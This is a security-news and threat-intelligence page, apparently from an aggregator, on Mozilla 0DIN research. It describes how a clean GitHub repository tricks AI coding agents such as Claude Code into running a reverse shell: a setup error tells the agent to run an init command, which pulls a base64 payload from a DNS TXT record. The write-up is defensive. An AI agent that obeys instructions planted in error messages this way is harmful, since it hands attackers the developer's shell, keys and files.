0DIN: Clean GitHub Repos Can Trick AI Agents Into Reverse Shells
Researchers at Mozilla's Zero Day Investigative Network (0DIN) demonstrated a novel attack method where AI coding agents, such as Claude Code, can be tricked into executing a reverse shell by interacting with a clean-looking GitHub repository. The attack chain involves a benign repository that triggers an error during setup, prompting the AI agent to run a suggested initialization command. This command fetches and executes a base64-encoded payload from an attacker-controlled DNS TXT record, resulting in a reverse shell running with the developer's privileges. The attack does not rely on traditional vulnerabilities or malicious code in the repository itself, making it difficult to detect with conventional security tools. The researchers recommend that AI agents disclose the full execution chain of setup commands before running them to mitigate this risk.
AI Analysis
Technical Summary
The 0DIN researchers demonstrated a three-stage attack exploiting AI coding agents' error recovery behavior. A clean GitHub repository with standard setup instructions causes an error that instructs the AI agent to run an initialization command. This command executes a shell script that retrieves a base64-encoded payload from a DNS TXT record controlled by the attacker and executes it, resulting in a reverse shell. The attack chain is indirect and appears benign at each step, evading static scanners and AI analysis tools. Successful exploitation grants the attacker a shell with the developer's privileges, exposing environment variables, API keys, and local configuration files. The payload can be changed dynamically by modifying the DNS record without altering the repository. The attack surface includes distribution vectors like fake job postings and tutorials. The recommended mitigation is for AI agents to fully disclose all dynamically fetched and executed code during setup before execution.
Potential Impact
If exploited, the attacker gains an interactive shell running with the developer's user privileges, allowing access to sensitive environment variables, API keys, and local configuration files. This can lead to unauthorized access, data exposure, and potential persistence on the developer's system. The attack bypasses conventional detection methods because no malicious code resides in the repository itself, and each step appears benign when analyzed in isolation.
Mitigation Recommendations
There is no traditional patch or fix since this is an exploitation of AI agent behavior rather than a software vulnerability. The recommended mitigation is that AI coding agents should fully disclose the entire execution chain of setup commands, including any dynamically fetched scripts or code, before running them. This transparency allows developers to review and approve potentially dangerous commands. Security teams should be aware of this attack vector when using AI coding assistants and scrutinize automated setup steps carefully.
0DIN: Clean GitHub Repos Can Trick AI Agents Into Reverse Shells
Description
Researchers at Mozilla's Zero Day Investigative Network (0DIN) demonstrated a novel attack method where AI coding agents, such as Claude Code, can be tricked into executing a reverse shell by interacting with a clean-looking GitHub repository. The attack chain involves a benign repository that triggers an error during setup, prompting the AI agent to run a suggested initialization command. This command fetches and executes a base64-encoded payload from an attacker-controlled DNS TXT record, resulting in a reverse shell running with the developer's privileges. The attack does not rely on traditional vulnerabilities or malicious code in the repository itself, making it difficult to detect with conventional security tools. The researchers recommend that AI agents disclose the full execution chain of setup commands before running them to mitigate this risk.
Reddit Discussion
The attack that Mozilla's 0DIN researchers detailed this week is not a vulnerability in any conventional sense. There is no zero-day, no memory corruption, no authentication bypass. It is an exploitation of exactly the behavior that makes AI coding agents useful: when a setup step fails, the agent reads the error and tries to fix it.
As [BleepingComputer reports](https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/), researchers at Mozilla's Zero Day Investigative Network demonstrated a three-stage attack against Claude Code and similar agentic tools. The first stage is a GitHub repository that looks entirely legitimate, with standard setup instructions such as `pip3 install -r requirements.txt`. The package installed by that command is engineered to throw an error instructing the agent to run `python3 -m axiom init`. That initialization command then silently resolves an attacker-controlled DNS TXT record, retrieves a base64-encoded value, and executes it via bash. The decoded payload is a reverse shell.
The researchers described the logic precisely: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated." That framing explains why conventional defenses miss it. Static scanners see only ordinary DNS resolution. AI analysis tools find nothing malicious in the repository. Every layer of the chain appears benign to every tool examining that layer in isolation.
Successful exploitation hands the attacker a shell running with the developer's own privileges, according to the research, meaning access to environment variables, API keys, and local configuration files. The payload can be swapped out by editing the DNS record alone, with no changes to the repository at all, so a codebase that looked clean during review could deliver something entirely different the next day.
0DIN warned the distribution surface is wide: such repositories could reach developers through fake job postings, tutorials, blog posts, or direct messages. The mitigation they recommended is specific: AI agents should fully disclose the execution chains of setup commands, including dynamically-fetched scripts and code, before running them. What the reporting does not give you is whether Anthropic or other tool vendors have committed to specific changes in response.
Links cited in this discussion
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The 0DIN researchers demonstrated a three-stage attack exploiting AI coding agents' error recovery behavior. A clean GitHub repository with standard setup instructions causes an error that instructs the AI agent to run an initialization command. This command executes a shell script that retrieves a base64-encoded payload from a DNS TXT record controlled by the attacker and executes it, resulting in a reverse shell. The attack chain is indirect and appears benign at each step, evading static scanners and AI analysis tools. Successful exploitation grants the attacker a shell with the developer's privileges, exposing environment variables, API keys, and local configuration files. The payload can be changed dynamically by modifying the DNS record without altering the repository. The attack surface includes distribution vectors like fake job postings and tutorials. The recommended mitigation is for AI agents to fully disclose all dynamically fetched and executed code during setup before execution.
Potential Impact
If exploited, the attacker gains an interactive shell running with the developer's user privileges, allowing access to sensitive environment variables, API keys, and local configuration files. This can lead to unauthorized access, data exposure, and potential persistence on the developer's system. The attack bypasses conventional detection methods because no malicious code resides in the repository itself, and each step appears benign when analyzed in isolation.
Mitigation Recommendations
There is no traditional patch or fix since this is an exploitation of AI agent behavior rather than a software vulnerability. The recommended mitigation is that AI coding agents should fully disclose the entire execution chain of setup commands, including any dynamically fetched scripts or code, before running them. This transparency allows developers to review and approve potentially dangerous commands. Security teams should be aware of this attack vector when using AI coding assistants and scrutinize automated setup steps carefully.
Technical Details
- Source Type
- Subreddit
- cybersecurity
- Reddit Score
- 0
- Discussion Level
- minimal
- Content Source
- reddit_link_post
- Post Type
- link
- Domain
- null
- Newsworthiness Assessment
- {"score":27,"reasons":["external_link","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":[],"foundNonNewsworthy":[]}
- Has External Source
- true
- Trusted Domain
- false
Threat ID: 6a40343e27e9c7971920dce2
Added to database: 06/27/2026, 20:36:14 UTC
Last enriched: 06/27/2026, 20:36:20 UTC
Last updated: 06/27/2026, 22:51:13 UTC
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.